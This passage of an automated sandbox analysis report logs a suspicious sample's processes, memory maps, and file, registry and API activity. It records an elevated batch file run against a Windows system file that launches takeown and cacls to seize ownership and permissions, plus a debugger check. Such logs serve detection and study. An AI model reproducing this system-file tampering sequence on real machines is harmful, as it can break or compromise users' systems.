| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x74f82780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x74f5fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x74f5a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x752a35c0 |
|
1 |
Environment (17)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
6 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #213: cmd.exe
269
0
| Information | Value |
|---|---|
| ID | #213 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c ""C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat" "C:\Program Files\Windows Journal\en-US\jnwdui.dll.mui"" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:32, Reason: Child Process |
| Unmonitor | End Time: 00:04:02, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:30 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x3e4 |
| Parent PID | 0xa70 (c:\users\ciihmnxmn6ps\desktop\mngrxc.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
3F0
0x
CBC
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| cmd.exe | 0x003f0000 | 0x0043ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x00000000006a0000 | 0x006a0000 | 0x0469ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00000000046a0000 | 0x046a0000 | 0x046bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000046a0000 | 0x046a0000 | 0x046affff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000046b0000 | 0x046b0000 | 0x046b3fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000046c0000 | 0x046c0000 | 0x046c1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000046c0000 | 0x046c0000 | 0x046c3fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000046d0000 | 0x046d0000 | 0x046e3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000046f0000 | 0x046f0000 | 0x0472ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004730000 | 0x04730000 | 0x0482ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004830000 | 0x04830000 | 0x04833fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004840000 | 0x04840000 | 0x04840fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004850000 | 0x04850000 | 0x04851fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004860000 | 0x04860000 | 0x0486ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004890000 | 0x04890000 | 0x0489ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000048a0000 | 0x048a0000 | 0x04aeffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x048a0000 | 0x0495dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004960000 | 0x04960000 | 0x0499ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000049f0000 | 0x049f0000 | 0x04aeffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004af0000 | 0x04af0000 | 0x04beffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004bf0000 | 0x04bf0000 | 0x04dbffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x04dc0000 | 0x050f6fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| cmdext.dll | 0x741b0000 | 0x741b7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007e770000 | 0x7e770000 | 0x7e86ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007e870000 | 0x7e870000 | 0x7e892fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007e897000 | 0x7e897000 | 0x7e899fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e89a000 | 0x7e89a000 | 0x7e89afff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e89c000 | 0x7e89c000 | 0x7e89efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e89f000 | 0x7e89f000 | 0x7e89ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (197)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
4 | |
| Get Info | "C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat" | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
28 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | - | type = file_type |
|
3 | |
| Open | STD_OUTPUT_HANDLE | - |
|
95 | |
| Open | STD_INPUT_HANDLE | - |
|
6 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
12 | |
| Read | - | size = 8191, size_out = 226 |
|
1 | |
| Read | - | size = 8191, size_out = 194 |
|
1 | |
| Read | - | size = 8191, size_out = 179 |
|
1 | |
| Read | - | size = 8191, size_out = 163 |
|
1 | |
| Read | - | size = 8191, size_out = 148 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
10 | |
| Write | STD_OUTPUT_HANDLE | size = 30 |
|
5 | |
| Write | STD_OUTPUT_HANDLE | size = 5 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 81 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 7 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 60 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 3 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 21 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 37 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 32 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 59 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 1 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 78, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (2)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\cacls.exe | os_pid = 0x864, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\Windows\system32\takeown.exe | os_pid = 0x34c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x3f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x74f82780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x74f5fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x74f5a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x752a35c0 |
|
1 |
Environment (43)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
12 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
5 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
6 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = USERNAME, result_out = CIiHmnxMn6Ps |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
5 | |
| Get Environment String | name = FN, result_out = "jnwdui.dll.mui" |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
2 | |
| Set Environment String | name = COPYCMD |
|
2 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
2 | |
| Set Environment String | name = =ExitCodeAscii |
|
2 | |
| Set Environment String | name = FN, value = "jnwdui.dll.mui" |
|
1 |
Process #215: qry2vco2.exe
175
0
| Information | Value |
|---|---|
| ID | #215 |
| File Name | c:\users\ciihmnxmn6ps\desktop\qry2vco2.exe |
| Command Line | qRY2vco2.exe -accepteula -c Run -y -p extract -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:33, Reason: Child Process |
| Unmonitor | End Time: 00:03:38, Reason: Self Terminated |
| Monitor Duration | 00:00:05 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x6b8 |
| Parent PID | 0x51c (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
824
0x
638
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x001d0000 | 0x0028dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x00290fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002a0000 | 0x002a0000 | 0x002affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002b0000 | 0x002b0000 | 0x002effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002f0000 | 0x002f0000 | 0x003effff | Private Memory | rw |
|
|
|
- |
| qry2vco2.exe | 0x00400000 | 0x00476fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0073ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x005effff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x00480000 | 0x004a9fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000005e0000 | 0x005e0000 | 0x005effff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000640000 | 0x00640000 | 0x0073ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000740000 | 0x00740000 | 0x008c7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000008d0000 | 0x008d0000 | 0x00a50fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000a60000 | 0x00a60000 | 0x01e5ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001e60000 | 0x01e60000 | 0x0205ffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74220000 | 0x742b1fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x742f0000 | 0x742f7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x74ab0000 | 0x74abbfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74da0000 | 0x74de3fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x74df0000 | 0x74f0ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x74f10000 | 0x74f3afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75030000 | 0x7517cfff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x75180000 | 0x7518efff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75310000 | 0x766cefff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x766d0000 | 0x7678dfff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x76790000 | 0x76c6cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76c70000 | 0x76daffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x77260000 | 0x772a3fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x77300000 | 0x7738cfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x77390000 | 0x77549fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffc57b4ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (8)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\qRY2vco264.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x74f40000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x77550000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x766d0000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x75030000 |
|
1 | |
| Load | USER32.dll | base_address = 0x76c70000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x742f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\qry2vco2.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\qRY2vco2.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x74f660c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x74f66110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x74f587e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x74f65f30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x74f64a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x74f65fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x74f5a510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x74f5c8c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x74f66300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x74f59a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x74f661b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x74f5fae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x77704f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x74f59a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x74f579b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x74f5fcb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x74f592b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x74f5a300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x74f66180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x74f63a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x74f58cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x74f65f20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x74f52af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x74f578f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x74f52db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x74f52da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x74f57a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x74f5a4b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x74f59660 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x74f5a0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x74f5a060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x74f587c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x74f58840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x74f57940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x74f59560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x74f669c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x74f66390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x74f81c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x74f668e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x74f66920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x74f66540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x776f5e80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x776f5e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x74f826a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x776eda90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x7770f190 |
|
1 | |
